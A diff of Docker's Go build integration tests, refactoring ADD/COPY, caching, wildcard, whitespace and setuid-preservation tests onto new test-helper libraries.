-	if err != nil {
-		c.Fatal(err)
-	}
-	deleteImages(name)
-	_, out, err := buildImageWithOut(name,
-		fmt.Sprintf(`FROM scratch
-		ADD %s/index.html /`, server.URL()),
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	if strings.Contains(out, "Using cache") {
+	cli.BuildCmd(c, name, build.WithDockerfile(fmt.Sprintf(`FROM scratch
+		ADD %s/robots.txt /`, server.URL())))
+
+	result := cli.Docker(cli.Build(name), build.WithDockerfile(fmt.Sprintf(`FROM scratch
+		ADD %s/index.html /`, server.URL())))
+	result.Assert(c, icmd.Success)
+	if strings.Contains(result.Combined(), "Using cache") {
 		c.Fatal("2nd build used cache on ADD, it shouldn't")
 	}
-
 }
 
 func (s *DockerSuite) TestBuildLastModified(c *check.C) {
+	// Temporary fix for #30890. TODO @jhowardmsft figure out what
+	// has changed in the master busybox image.
+	testRequires(c, DaemonIsLinux)
+
 	name := "testbuildlastmodified"
 
-	server, err := fakeStorage(map[string]string{
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"file": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
 	var out, out2 string
+	args := []string{"run", name, "ls", "-l", "--full-time", "/file"}
 
 	dFmt := `FROM busybox
 ADD %s/file /`
-
 	dockerfile := fmt.Sprintf(dFmt, server.URL())
 
-	if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil {
-		c.Fatal(err)
-	}
-
-	out, _ = dockerCmd(c, "run", name, "ls", "-le", "/file")
+	cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile))
+	out = cli.DockerCmd(c, args...).Combined()
 
 	// Build it again and make sure the mtime of the file didn't change.
 	// Wait a few seconds to make sure the time changed enough to notice
 	time.Sleep(2 * time.Second)
 
-	if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil {
-		c.Fatal(err)
-	}
-	out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file")
+	cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile))
+	out2 = cli.DockerCmd(c, args...).Combined()
 
 	if out != out2 {
 		c.Fatalf("MTime changed:\nOrigin:%s\nNew:%s", out, out2)
@@ -569,20 +422,14 @@ ADD %s/file /`
 
 	// Now 'touch' the file and make sure the timestamp DID change this time
 	// Create a new fakeStorage instead of just using Add() to help windows
-	server, err = fakeStorage(map[string]string{
+	server = fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"file": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
 	dockerfile = fmt.Sprintf(dFmt, server.URL())
-
-	if _, _, err = buildImageWithOut(name, dockerfile, false); err != nil {
-		c.Fatal(err)
-	}
-	out2, _ = dockerCmd(c, "run", name, "ls", "-le", "/file")
+	cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile))
+	out2 = cli.DockerCmd(c, args...).Combined()
 
 	if out == out2 {
 		c.Fatalf("MTime didn't change:\nOrigin:%s\nNew:%s", out, out2)
@@ -596,28 +443,20 @@ ADD %s/file /`
 func (s *DockerSuite) TestBuildModifyFileInFolder(c *check.C) {
 	name := "testbuildmodifyfileinfolder"
 
-	ctx, err := fakeContext(`FROM busybox
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox
 RUN ["mkdir", "/test"]
-ADD folder/file /test/changetarget`,
-		map[string]string{})
-	if err != nil {
-		c.Fatal(err)
-	}
+ADD folder/file /test/changetarget`))
 	defer ctx.Close()
 	if err := ctx.Add("folder/file", "first"); err != nil {
 		c.Fatal(err)
 	}
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 	if err := ctx.Add("folder/file", "second"); err != nil {
 		c.Fatal(err)
 	}
-	id2, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
 	if id1 == id2 {
 		c.Fatal("cache was used even though file contents in folder was changed")
 	}
@@ -625,8 +464,8 @@ ADD folder/file /test/changetarget`,
 
 func (s *DockerSuite) TestBuildAddSingleFileToRoot(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testaddimg"
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	buildImageSuccessfully(c, "testaddimg", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
@@ -634,37 +473,24 @@ RUN chown dockerio.dockerio /exists
 ADD test_file /
 RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
-		map[string]string{
-			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)),
+		build.WithFile("test_file", "test1")))
 }
 
 // Issue #3960: "ADD src ." hangs
 func (s *DockerSuite) TestBuildAddSingleFileToWorkdir(c *check.C) {
 	name := "testaddsinglefiletoworkdir"
-	ctx, err := fakeContext(`FROM busybox
-ADD test_file .`,
-		map[string]string{
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(
+		`FROM busybox
+	       ADD test_file .`),
+		fakecontext.WithFiles(map[string]string{
 			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
+		}))
 	defer ctx.Close()
 
 	errChan := make(chan error)
 	go func() {
-		_, err := buildImageFromContext(name, ctx, true)
-		errChan <- err
+		errChan <- buildImage(name, build.WithExternalBuildContext(ctx)).Error
 		close(errChan)
 	}()
 	select {
@@ -677,8 +503,8 @@ ADD test_file .`,
 
 func (s *DockerSuite) TestBuildAddSingleFileToExistDir(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testaddsinglefiletoexistdir"
-	ctx, err := fakeContext(`FROM busybox
+	cli.BuildCmd(c, "testaddsinglefiletoexistdir", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN mkdir /exists
@@ -687,32 +513,19 @@ RUN chown -R dockerio.dockerio /exists
 ADD test_file /exists/
 RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
 RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]
-RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
-		map[string]string{
-			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`),
+		build.WithFile("test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildCopyAddMultipleFiles(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	server, err := fakeStorage(map[string]string{
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"robots.txt": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
-	name := "testcopymultiplefilestofile"
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	cli.BuildCmd(c, "testcopymultiplefilestofile", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN mkdir /exists
@@ -723,141 +536,75 @@ ADD test_file3 test_file4 %s/robots.txt /exists/
 RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
 RUN [ $(ls -l /exists/test_file1 | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /exists/test_file2 | awk '{print $3":"$4}') = 'root:root' ]
-
 RUN [ $(ls -l /exists/test_file3 | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /exists/test_file4 | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /exists/robots.txt | awk '{print $3":"$4}') = 'root:root' ]
-
 RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
-`, server.URL()),
-		map[string]string{
-			"test_file1": "test1",
-			"test_file2": "test2",
-			"test_file3": "test3",
-			"test_file4": "test4",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+`, server.URL())),
+		build.WithFile("test_file1", "test1"),
+		build.WithFile("test_file2", "test2"),
+		build.WithFile("test_file3", "test3"),
+		build.WithFile("test_file3", "test3"),
+		build.WithFile("test_file4", "test4")))
 }
 
-// This test is mainly for user namespaces to verify that new directories
+// These tests are mainly for user namespaces to verify that new directories
 // are created as the remapped root uid/gid pair
-func (s *DockerSuite) TestBuildAddToNewDestination(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testaddtonewdest"
-	ctx, err := fakeContext(`FROM busybox
-ADD . /new_dir
-RUN ls -l /
-RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`,
-		map[string]string{
-			"test_dir/test_file": "test file",
-		})
-	if err != nil {
-		c.Fatal(err)
+func (s *DockerSuite) TestBuildUsernamespaceValidateRemappedRoot(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testCases := []string{
+		"ADD . /new_dir",
+		"COPY test_dir /new_dir",
+		"WORKDIR /new_dir",
 	}
-	defer ctx.Close()
+	name := "testbuildusernamespacevalidateremappedroot"
+	for _, tc := range testCases {
+		cli.BuildCmd(c, name, build.WithBuildContext(c,
+			build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
+%s
+RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, tc)),
+			build.WithFile("test_dir/test_file", "test file")))
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
+		cli.DockerCmd(c, "rmi", name)
 	}
 }
 
-// This test is mainly for user namespaces to verify that new directories
-// are created as the remapped root uid/gid pair
-func (s *DockerSuite) TestBuildCopyToNewParentDirectory(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopytonewdir"
-	ctx, err := fakeContext(`FROM busybox
-COPY test_dir /new_dir
-RUN ls -l /new_dir
-RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`,
-		map[string]string{
-			"test_dir/test_file": "test file",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
+func (s *DockerSuite) TestBuildAddAndCopyFileWithWhitespace(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Not currently passing on Windows
+	name := "testaddfilewithwhitespace"
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-}
-
-// This test is mainly for user namespaces to verify that new directories
-// are created as the remapped root uid/gid pair
-func (s *DockerSuite) TestBuildWorkdirIsContainerRoot(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testworkdirownership"
-	if _, err := buildImage(name, `FROM busybox
-WORKDIR /new_dir
-RUN ls -l /
-RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'root:root' ]`, true); err != nil {
-		c.Fatal(err)
-	}
-}
-
-func (s *DockerSuite) TestBuildAddFileWithWhitespace(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Not currently passing on Windows
-	name := "testaddfilewithwhitespace"
-	ctx, err := fakeContext(`FROM busybox
+	for _, command := range []string{"ADD", "COPY"} {
+		cli.BuildCmd(c, name, build.WithBuildContext(c,
+			build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 RUN mkdir "/test dir"
 RUN mkdir "/test_dir"
-ADD [ "test file1", "/test_file1" ]
-ADD [ "test_file2", "/test file2" ]
-ADD [ "test file3", "/test file3" ]
-ADD [ "test dir/test_file4", "/test_dir/test_file4" ]
-ADD [ "test_dir/test_file5", "/test dir/test_file5" ]
-ADD [ "test dir/test_file6", "/test dir/test_file6" ]
+%s [ "test file1", "/test_file1" ]
+%s [ "test_file2", "/test file2" ]
+%s [ "test file3", "/test file3" ]
+%s [ "test dir/test_file4", "/test_dir/test_file4" ]
+%s [ "test_dir/test_file5", "/test dir/test_file5" ]
+%s [ "test dir/test_file6", "/test dir/test_file6" ]
 RUN [ $(cat "/test_file1") = 'test1' ]
 RUN [ $(cat "/test file2") = 'test2' ]
 RUN [ $(cat "/test file3") = 'test3' ]
 RUN [ $(cat "/test_dir/test_file4") = 'test4' ]
 RUN [ $(cat "/test dir/test_file5") = 'test5' ]
-RUN [ $(cat "/test dir/test_file6") = 'test6' ]`,
-		map[string]string{
-			"test file1":          "test1",
-			"test_file2":          "test2",
-			"test file3":          "test3",
-			"test dir/test_file4": "test4",
-			"test_dir/test_file5": "test5",
-			"test dir/test_file6": "test6",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
+RUN [ $(cat "/test dir/test_file6") = 'test6' ]`, command, command, command, command, command, command)),
+			build.WithFile("test file1", "test1"),
+			build.WithFile("test_file2", "test2"),
+			build.WithFile("test file3", "test3"),
+			build.WithFile("test dir/test_file4", "test4"),
+			build.WithFile("test_dir/test_file5", "test5"),
+			build.WithFile("test dir/test_file6", "test6"),
+		))
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
+		cli.DockerCmd(c, "rmi", name)
 	}
 }
 
-func (s *DockerSuite) TestBuildCopyFileWithWhitespace(c *check.C) {
-	dockerfile := `FROM busybox
-RUN mkdir "/test dir"
-RUN mkdir "/test_dir"
-COPY [ "test file1", "/test_file1" ]
-COPY [ "test_file2", "/test file2" ]
-COPY [ "test file3", "/test file3" ]
-COPY [ "test dir/test_file4", "/test_dir/test_file4" ]
-COPY [ "test_dir/test_file5", "/test dir/test_file5" ]
-COPY [ "test dir/test_file6", "/test dir/test_file6" ]
-RUN [ $(cat "/test_file1") = 'test1' ]
-RUN [ $(cat "/test file2") = 'test2' ]
-RUN [ $(cat "/test file3") = 'test3' ]
-RUN [ $(cat "/test_dir/test_file4") = 'test4' ]
-RUN [ $(cat "/test dir/test_file5") = 'test5' ]
-RUN [ $(cat "/test dir/test_file6") = 'test6' ]`
-
-	if daemonPlatform == "windows" {
-		dockerfile = `FROM ` + WindowsBaseImage + `
+func (s *DockerSuite) TestBuildCopyFileWithWhitespaceOnWindows(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	dockerfile := `FROM ` + testEnv.PlatformDefaults.BaseImage + `
 RUN mkdir "C:/test dir"
 RUN mkdir "C:/test_dir"
 COPY [ "test file1", "/test_file1" ]
@@ -872,40 +619,28 @@ RUN find "test3" "C:/test file3"
 RUN find "test4" "C:/test_dir/test_file4"
 RUN find "test5" "C:/test dir/test_file5"
 RUN find "test6" "C:/test dir/test_file6"`
-	}
 
 	name := "testcopyfilewithwhitespace"
-	ctx, err := fakeContext(dockerfile,
-		map[string]string{
-			"test file1":          "test1",
-			"test_file2":          "test2",
-			"test file3":          "test3",
-			"test dir/test_file4": "test4",
-			"test_dir/test_file5": "test5",
-			"test dir/test_file6": "test6",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile("test file1", "test1"),
+		build.WithFile("test_file2", "test2"),
+		build.WithFile("test file3", "test3"),
+		build.WithFile("test dir/test_file4", "test4"),
+		build.WithFile("test_dir/test_file5", "test5"),
+		build.WithFile("test dir/test_file6", "test6"),
+	))
 }
 
 func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) {
 	name := "testcopywildcard"
-	server, err := fakeStorage(map[string]string{
+	server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{
 		"robots.txt": "hello",
 		"index.html": "world",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
+	}))
 	defer server.Close()
 
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM busybox
 	COPY file*.txt /tmp/
 	RUN ls /tmp/file1.txt /tmp/file2.txt
 	RUN [ "mkdir",  "/tmp1" ]
@@ -914,29 +649,22 @@ func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) {
 	RUN [ "mkdir",  "/tmp2" ]
         ADD dir/*dir %s/robots.txt /tmp2/
 	RUN ls /tmp2/nest_nest_file /tmp2/robots.txt
-	`, server.URL()),
-		map[string]string{
+	`, server.URL())),
+		fakecontext.WithFiles(map[string]string{
 			"file1.txt":                     "test1",
 			"file2.txt":                     "test2",
 			"dir/nested_file":               "nested file",
 			"dir/nested_dir/nest_nest_file": "2 times nested",
 			"dirt": "dirty",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
+		}))
 	defer ctx.Close()
 
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 
 	// Now make sure we use a cache the 2nd time
-	id2, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
 
 	if id1 != id2 {
 		c.Fatal("didn't use the cache")
@@ -945,55 +673,44 @@ func (s *DockerSuite) TestBuildCopyWildcard(c *check.C) {
 }
 
 func (s *DockerSuite) TestBuildCopyWildcardInName(c *check.C) {
-	name := "testcopywildcardinname"
-	ctx, err := fakeContext(`FROM busybox
+	// Run this only on Linux
+	// Below is the original comment (that I don't agree with — vdemeester)
+	// Normally we would do c.Fatal(err) here but given that
+	// the odds of this failing are so rare, it must be because
+	// the OS we're running the client on doesn't support * in
+	// filenames (like windows).  So, instead of failing the test
+	// just let it pass. Then we don't need to explicitly
+	// say which OSs this works on or not.
+	testRequires(c, DaemonIsLinux, UnixCli)
+
+	buildImageSuccessfully(c, "testcopywildcardinname", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 	COPY *.txt /tmp/
 	RUN [ "$(cat /tmp/\*.txt)" = 'hi there' ]
-	`, map[string]string{"*.txt": "hi there"})
-
-	if err != nil {
-		// Normally we would do c.Fatal(err) here but given that
-		// the odds of this failing are so rare, it must be because
-		// the OS we're running the client on doesn't support * in
-		// filenames (like windows).  So, instead of failing the test
-		// just let it pass. Then we don't need to explicitly
-		// say which OSs this works on or not.
-		return
-	}
-	defer ctx.Close()
-
-	_, err = buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatalf("should have built: %q", err)
-	}
+	`),
+		build.WithFile("*.txt", "hi there"),
+	))
 }
 
 func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) {
 	name := "testcopywildcardcache"
-	ctx, err := fakeContext(`FROM busybox
-	COPY file1.txt /tmp/`,
-		map[string]string{
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox
+	COPY file1.txt /tmp/`),
+		fakecontext.WithFiles(map[string]string{
 			"file1.txt": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
+		}))
 	defer ctx.Close()
 
-	id1, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id1 := getIDByName(c, name)
 
 	// Now make sure we use a cache the 2nd time even with wild cards.
 	// Use the same context so the file is the same and the checksum will match
 	ctx.Add("Dockerfile", `FROM busybox
 	COPY file*.txt /tmp/`)
 
-	id2, err := buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
+	id2 := getIDByName(c, name)
 
 	if id1 != id2 {
 		c.Fatal("didn't use the cache")
@@ -1003,8 +720,8 @@ func (s *DockerSuite) TestBuildCopyWildcardCache(c *check.C) {
 
 func (s *DockerSuite) TestBuildAddSingleFileToNonExistingDir(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testaddsinglefiletononexistingdir"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testaddsinglefiletononexistingdir", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
@@ -1012,49 +729,28 @@ RUN chown dockerio.dockerio /exists
 ADD test_file /test_dir/
 RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
-		map[string]string{
-			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`),
+		build.WithFile("test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildAddDirContentToRoot(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testadddircontenttoroot"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testadddircontenttoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
 RUN chown dockerio.dockerio exists
 ADD test_dir /
 RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
-		map[string]string{
-			"test_dir/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`),
+		build.WithFile("test_dir/test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildAddDirContentToExistingDir(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testadddircontenttoexistingdir"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testadddircontenttoexistingdir", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN mkdir /exists
@@ -1063,24 +759,14 @@ RUN chown -R dockerio.dockerio /exists
 ADD test_dir/ /exists/
 RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
 RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
-RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`,
-		map[string]string{
-			"test_dir/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`),
+		build.WithFile("test_dir/test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildAddWholeDirToRoot(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testaddwholedirtoroot"
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	buildImageSuccessfully(c, "testaddwholedirtoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
@@ -1090,67 +776,40 @@ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ]
 RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
-		map[string]string{
-			"test_dir/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)),
+		build.WithFile("test_dir/test_file", "test1")))
 }
 
-// Testing #5941
-func (s *DockerSuite) TestBuildAddEtcToRoot(c *check.C) {
-	name := "testaddetctoroot"
-
-	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
-ADD . /`,
-		map[string]string{
-			"etc/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+// Testing #5941 : Having an etc directory in context conflicts with the /etc/mtab
+func (s *DockerSuite) TestBuildAddOrCopyEtcToRootShouldNotConflict(c *check.C) {
+	buildImageSuccessfully(c, "testaddetctoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+`
+ADD . /`),
+		build.WithFile("etc/test_file", "test1")))
+	buildImageSuccessfully(c, "testcopyetctoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+`
+COPY . /`),
+		build.WithFile("etc/test_file", "test1")))
 }
 
-// Testing #9401
+// Testing #9401 : Losing setuid flag after a ADD
 func (s *DockerSuite) TestBuildAddPreservesFilesSpecialBits(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testaddpreservesfilesspecialbits"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testaddetctoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 ADD suidbin /usr/bin/suidbin
 RUN chmod 4755 /usr/bin/suidbin
 RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]
 ADD ./data/ /
-RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`,
-		map[string]string{
-			"suidbin":             "suidbin",
-			"/data/usr/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /usr/bin/suidbin | awk '{print $1}') = '-rwsr-xr-x' ]`),
+		build.WithFile("suidbin", "suidbin"),
+		build.WithFile("/data/usr/test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildCopySingleFileToRoot(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopysinglefiletoroot"
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	buildImageSuccessfully(c, "testcopysinglefiletoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
@@ -1158,37 +817,23 @@ RUN chown dockerio.dockerio /exists
 COPY test_file /
 RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /test_file | awk '{print $1}') = '%s' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
-		map[string]string{
-			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)),
+		build.WithFile("test_file", "test1")))
 }
 
 // Issue #3960: "ADD src ." hangs - adapted for COPY
 func (s *DockerSuite) TestBuildCopySingleFileToWorkdir(c *check.C) {
 	name := "testcopysinglefiletoworkdir"
